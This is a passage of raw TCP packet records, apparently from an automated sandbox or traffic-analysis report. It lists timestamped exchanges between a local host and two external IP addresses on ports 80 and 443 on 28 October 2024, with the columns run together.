                                                        Oct 28, 2024 11:21:27.735172987 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.735204935 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.735208988 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.735234022 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.735260010 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.735261917 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.735332966 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.735903025 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.735953093 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.735965967 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736000061 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736048937 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.736048937 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.736054897 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736112118 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.736726046 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736778021 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736783981 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.736812115 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736829042 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.736848116 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.736870050 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.736892939 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.737616062 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.737649918 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.737683058 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.737694025 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.737703085 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.737802029 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.738333941 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.738385916 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.740197897 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.740231991 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.740268946 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.740323067 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850002050 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850080013 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850145102 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850193977 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850198030 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850230932 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850258112 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850265980 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850279093 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850301981 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850327969 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850337029 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850346088 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850368977 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850394964 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850404024 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850419044 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850457907 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850464106 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850501060 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850526094 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850554943 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850622892 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850681067 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850765944 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850800991 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850825071 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850835085 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850856066 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850869894 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850886106 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850905895 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850925922 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850940943 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850966930 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.850977898 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.850985050 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851007938 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851037979 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851059914 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851211071 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851243973 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851274014 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851279974 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851293087 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851335049 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851350069 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851372004 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851396084 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851407051 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851427078 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851442099 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851447105 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851475954 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851494074 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851510048 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851531982 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851542950 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851568937 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851581097 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.851593018 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.851638079 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.852075100 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.852109909 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.852144003 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.852149010 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.852178097 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.852178097 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.852200031 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.852215052 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.852240086 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.852251053 CET8049164107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:27.852267027 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:27.852300882 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:28.012681007 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.012748003 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:28.012818098 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.024224043 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:28.024283886 CET4916480192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:28.027703047 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.027729034 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:28.652527094 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:28.652642965 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.657475948 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.657504082 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:28.657802105 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:28.657860994 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.742152929 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:28.787331104 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:29.119236946 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:29.119357109 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:29.119391918 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:29.119416952 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:29.119455099 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:29.119503975 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:29.120982885 CET49165443192.168.2.22188.114.96.3
                                                        Oct 28, 2024 11:21:29.121016979 CET44349165188.114.96.3192.168.2.22
                                                        Oct 28, 2024 11:21:29.962356091 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:29.968075991 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:29.968192101 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:29.972815037 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:29.978355885 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631392002 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631455898 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631494999 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631529093 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631541014 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631566048 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631598949 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631598949 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631602049 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631638050 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631658077 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631671906 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631685972 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631707907 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631711006 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631747007 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.631762981 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.631802082 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.637233973 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.637276888 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.637331009 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.637331009 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.637341976 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.637379885 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.637435913 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.637748957 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.748836994 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.748909950 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.748918056 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.748949051 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.748969078 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.748986006 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749003887 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.749025106 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749027967 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.749077082 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.749186993 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749242067 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749342918 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.749367952 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749403954 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749439955 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.749456882 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.749483109 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.749483109 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750096083 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750133038 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750152111 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750170946 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750178099 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750221014 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750462055 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750495911 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750518084 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750533104 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750538111 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750570059 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750581980 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750619888 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.750633955 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.750715017 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.751620054 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.751656055 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.751677990 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.751691103 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.751699924 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.751725912 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.751740932 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.751763105 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.751775026 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.751827955 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.752454042 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.752511024 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.754631996 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.754693031 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866235018 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866321087 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866362095 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866384983 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866396904 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866411924 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866432905 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866450071 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866450071 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866488934 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866523027 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866540909 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866559982 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866578102 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866595030 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866600990 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866631031 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866661072 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866671085 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866719961 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866781950 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866833925 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866842985 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866871119 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866883993 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866921902 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.866929054 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866966009 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.866978884 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867016077 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867259026 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867310047 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867332935 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867362976 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867373943 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867398024 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867414951 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867434978 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867445946 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867470026 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867480993 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867506027 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867516041 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867542028 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867558956 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867578030 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867587090 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867613077 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.867620945 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867662907 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.867985964 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868040085 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868046045 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868088961 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868093014 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868129015 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868145943 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868165016 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868180037 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868200064 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868211985 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868237019 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868249893 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868273020 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868288040 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868309021 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868330002 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868350029 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868351936 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868398905 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868844032 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868894100 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868896008 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868944883 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.868952036 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.868987083 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869000912 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869023085 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869039059 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869059086 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869079113 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869096041 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869115114 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869129896 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869139910 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869165897 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869179010 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869199991 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869216919 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869236946 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869250059 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869287014 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.869736910 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869767904 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.869818926 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.983671904 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.983777046 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.983805895 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.983834028 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.983855009 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.983881950 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.983889103 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.983925104 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.983935118 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.983961105 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.983969927 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.983997107 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984008074 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984035015 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984050989 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984066963 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984077930 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984110117 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984122038 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984158993 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984174967 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984194040 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984199047 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984229088 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984241009 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984278917 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984282017 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984318018 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984333038 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984369993 CET4916680192.168.2.22107.175.113.214
                                                        Oct 28, 2024 11:21:30.984375954 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984412909 CET8049166107.175.113.214192.168.2.22
                                                        Oct 28, 2024 11:21:30.984433889 CET4916680192.168.2.22107.175.113.214
